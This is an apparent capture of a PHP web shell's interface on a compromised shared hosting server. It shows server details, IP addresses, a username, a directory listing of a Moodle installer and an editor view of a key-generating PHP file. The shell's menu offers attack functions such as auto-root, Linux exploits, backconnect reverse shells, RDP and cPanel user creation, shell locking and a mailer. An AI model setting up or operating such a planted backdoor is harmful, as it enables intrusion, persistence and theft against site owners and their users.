Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.226.104.30
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
moodle42 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
NOTES.txt
1.93
KB
-rw-r--r--
add_admin.php
733
B
-rw-r--r--
check_utf8.php
5.88
KB
-rw-r--r--
clone.php
5.48
KB
-rw-r--r--
config.php
745
B
-rw-r--r--
data.zip
7.42
KB
-rw-r--r--
edit.php
4.61
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
12.43
KB
-rw-r--r--
fileindex.php
947
B
-rw-r--r--
get_plugin_list.php
572
B
-rw-r--r--
import.php
7.09
KB
-rw-r--r--
info.xml
3.56
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
11.01
KB
-rw-r--r--
install.xml
3.24
KB
-rw-r--r--
md5
4.94
KB
-rw-r--r--
moodle42.sql
1.15
MB
-rw-r--r--
moodle42.zip
79.36
MB
-rw-r--r--
privatekey.php
975
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
8.06
KB
-rw-r--r--
upgrade.xml
307
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : privatekey.php
<?php // We do not need this file any more @unlink('privatekey.php'); $ltikey = __mod_lti_verify_private_key(); $enrol_lti = __mod_lti_verify_private_key(); echo '<kid>'.$ltikey['kid'].'</kid>'; echo '<privatekey>'.$ltikey['privatekey'].'</privatekey>'; echo '<enrol_lti_kid>'.$enrol_lti['kid'].'</enrol_lti_kid>'; echo '<enrol_lti_privatekey>'.$enrol_lti['privatekey'].'</enrol_lti_privatekey>'; function __mod_lti_verify_private_key() { global $error; if (!function_exists('openssl_random_pseudo_bytes')) { $error[] = "openssl must be loaded for openssl_random_pseudo_bytes to function"; return null; } // Create the private key. $kid = bin2hex(openssl_random_pseudo_bytes(10)); $config = array( "digest_alg" => "sha256", "private_key_bits" => 2048, "private_key_type" => OPENSSL_KEYTYPE_RSA, ); $res = openssl_pkey_new($config); openssl_pkey_export($res, $privatekey); return array( 'kid' => $kid, 'privatekey' => $privatekey, ); } ?>
Close